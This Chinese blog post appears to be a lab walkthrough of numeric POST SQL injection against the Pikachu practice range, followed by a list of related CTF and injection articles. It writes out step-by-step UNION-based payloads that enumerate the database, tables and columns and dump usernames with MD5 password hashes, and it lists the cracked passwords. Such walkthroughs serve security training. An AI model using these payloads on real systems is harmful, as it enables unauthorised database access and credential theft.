数字型注入(post)

最新推荐文章于 2024-10-06 21:49:48 发布
最新推荐文章于 2024-10-06 21:49:48 发布
阅读量258 收藏 10
点赞数 4
分类专栏: SQL注入 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73049307/article/details/141643942
版权

这里以pikachu靶场为例:

选择不同数字,查询的结果不同

(这里的一些结果是一些关卡修改过的,只是观感上的区别)

可以看到虽然选择的数字不同,但是地址栏中的url没有发生变化,猜测是post型注入

选择数字1,用burp抓取查询的包,发送到repeater中:

判断是数字型还是字符型:

修改id=1 and 1=1#

修改id=1 and 1=2#

说明是数字型注入

判断字段数:

修改id=1 order by 2#

修改id=1 order by 3#

说明字段数是2(即列数)

判断回显位:

修改id=1 union select 1,2#

说明回显位在第2列

查询数据库名:

修改id=1 union select user(),database()#

得知用户名是localhost,且数据库名是pikachu

查询数据库pikachu的表名:

修改id=1 union select user(),table_name from information_schema.tables where table_schema='pikachu'#

可以看到有个users表

查询users表中的列名:

修改id=1 union select 1,column_name from information_schema.columns where table_schema='pikachu' and table_name='users'#

爆出了users表中有username和password

查询users表中的username和password值:

修改id=1 union select username,password from users#

爆出了username有三个admin,pikachu,test及对应的password的md5值,去解密一下:(md5在线解密破解,md5解密加密

admin——123456

pikachu——000000

test——abc123

当然,也可以用hackbar中的POST来传参来爆破username和password

南暮思鸢
关注
专栏目录
SQL注入之绕过is_numeric过滤
ChuMeng1999的博客
10-29 1133
本实验中的is_numeric()函数用于检测变量是否为数字或数字字符串。如果将二进制或十六进制数据传递至is_numeric()函数,则也会返回为true,即被is_numeric()函数检测是数字。现在,我们进行测试。编写is_numeric.php文件,并将以下代码输入后,保存。再执行该程序,可得到结果:bool(true)。php!$(!$代表上一条命令的最后一个参数,即is_numeric.php)
bugkuctf web 部分wp(自己看得懂)
LJW_wenjingli7的博客
12-15 2539
1.本地管理员 进入网址,查源码,异常的一串n,拉进度条看 == 是base64,解出test123 ,像密码。 这种未知的系统一般要爆破,随便填账号密码,连接代理,打开bp 右键发到repeater,去掉cookie请求,用XXF伪造请求IP,(能考虑到管理员可能是admin,直接省略改名)改user=admin,发送即可 **XXF: X-Forwarded-For:(HTTP的请求端真实的IP) 如题中的:X-Forwarded-For:127.0.0.1 XFF注入..
CTF笔记:PHP函数is_numeric()绕过
qq_46145027的博客
04-30 5839
在做CTF过程中遇到的is_numeric()函数,作用是判断输入是不是数字或数字字符串。 思路1:数值->非数值 原题是[极客大挑战 2019]BuyFlag,判断代码如下: if (is_numeric($password)) { echo "password can't be number</br>"; }elseif ($password == 404) { echo "Password Right!</br>"; } 密码是404,但是不能输入数
ctf的php,CTF中常见的PHP知识点
weixin_35796207的博客
03-09 1331
PHP是一门比较松散的语言,既方便,又容易出现一些问题。本文主要概括一些常见的PHP弱类型,正则表达式函数跟变量覆盖的内容,在CTF这方面也经常出现在代码审计相关的题目中。一、弱类型0x01 "=="与"==="的区别在使用"=="时会自动转换类型,而"==="则是校验类型,而非转换。1 == '1'; //true1 == '1abcdef'; //true0 == 'abcdefg'; ...
【pikachu-SQL】数字型注入post)2022,超详细
weixin_46497491的博客
09-10 1635
【pikachu-SQL】数字型注入post)2022,超详细,web渗透,sql注入,渗透测试
网络安全之pikachu数字型注入post)实战
weixin_44255593的博客
02-25 1347
1、打开pikachu数字型注入post)靶场,随机选择一个数字进行查询,并开启BURP进行抓包。 2、使用UNION联合查询法判断字段数,测试在id=1后面构造order by 1和order by 2时没有报错,当个到第三个时回显报错,所以可以判断字段数为2个字段。 id=1 order by 1 &submit=%E6%9F%A5%E8%AF%A2 id=1 order by 3 &submit=%E6%9F%A5%E8%AF%A2 3、通过联合查询法构造un.
Pikachu靶场:SQL-Inject之数字型注入post
witwitwiter的博客
04-14 2130
Pikachu靶场:SQL-Inject之数字型注入post) 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击着可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 实验步骤 1.前期工作 先将Proxy中的intercept关闭,使其不进行拦截,让数据通过监听的端口。 2.注入点探测 在数字型注入中只看到一个下拉框,里面包含
mysql post手工注入_pikachu-数字型注入(post)#手工注入
weixin_39842237的博客
02-07 712
1,因为是post型,所以需要抓取数据包2,测试结果为数字型注入提交恒等的语句可以查询到所有的数据信息3,使用UNION联合查询法判断字段数,测试为2个字段时没有报错,所以可以判断字段数为24,爆字段 #发现两个都可以查询5,查询数据库 #可以查到数据库名称为 pikachu6,查数据库pikachu下的表 #可以查到库pikachu下面有5个表(httpinfo,member,message,u...
Pikachu靶场-SQL注入-数字型注入post)过关步骤
weixin_44257023的博客
07-16 1083
Pikachu靶场-SQL注入-数字型注入post)过关步骤,重点是学习方法,当然有很多方法用工具什么的这里就是手工注入
SQL注入基础--数字型注入
qq_42988351的博客
04-02 8166
参考 参考学习链接 学习笔记–基础篇–sql注入数字型) SQL注入简述 SQL注入,就是利用现有Web应用程序,构建特殊的参数输入,将(恶意的)SQL语句注入到后台数据库引擎,最终达到欺骗服务器执行恶意SQL语句的目的。 SQL注入的本质是后台SQL语句使用了拼接查询,未对用户输入的数据作安全处理。 SQL注入分类 根据注入形式的不同,可分为: 数字型注 字符型注 搜索型注入 根据请求方式的不同,可分为: GET型注 POST型注 HEADER型注入 根据注入点位置的不同,可分为: 列
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
数字型,字符型POST注入
m0_64338210的博客
02-17 351
实验步骤 本实验的目标是:以SQLi-Labs网站的Less-11为入口,利用联合查询(union select)的方式实施SQL注入,获取 SQLi-Labs 网站的登录用户名和密码。 1.访问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的SQLi-Labs 网站Less-11。访问的URL为: http://[靶机IP]/sqli-labs/Less-11/ 2.利用Burpsuite 工具抓包 (1)启动Burp
PIKACHU靶场 ——字符和数字型SQL注入练习
PICACHU+++的博客
04-03 893
进入靶场可以看见一个输入框,所以现在里面判断注入点类型,在输入框中输入了1'后,报错,并且显示到URL中,判断参数提交方式为GET传参在URL栏中输入了一下语句,判断为字符型SQL注入漏洞1' #报错1'and'1'='1 #未报错1'and'1'='2 #未报错综上为字符型SQL注入漏洞。
实用SQL小总结
UntifA的博客
09-29 1400
SQL记录
Ubuntu有关redis的命令
最新发布
weixin_53717695的博客
10-06 106
Ubuntu有关redis的命令
MySQL之复合查询与内外连接
zdlynj的博客
09-30 1242
前面我们讲解的mysql表的查询都是对一张表进行查询,即数据的查询都是在某一时刻对一个表进行操作的。而在实际开发中,我们往往还需要对多个表同时进行查询。我们这里使用的测试表,为雇员信息表(来自Oracle 9i的经典测试表):EMP员工表,DEPT部门表,SALGRADE工资等级表。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
qq 117791303
10-02 295
Wintergrasp 冬拥湖 120 VS 120
Redis事务
zhzjn的博客
09-30 375
Redis事务可以通过MULTI、EXEC、WATCH和DISCARD指令来实现。1. MULTI指令:表示事务的开始,之后的所有指令都会被逐一记录,但不会立即执行。2. EXEC指令:表示事务的执行,会按照记录的指令逐一执行。3. WATCH指令:可以监视一个或多个键的变化,如果在事务执行期间被其他客户端修改,事务会被回滚。4. DISCARD指令:表示事务的撤销,可以放弃之前记录的指令。
pikachu数字型注入(post)
04-10
这个问题是关于使用Python中的字母、数字和下划线命名变量的语法问题。具体来说,'pikachu'是一个以字母开头的变量名,而'\xe6\x95\xb0\xe5\xad\x97\xe5\x9e\x8b\xe6\xb3\xa8\xe5\x85\xa5(post)'可能是一个函数或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值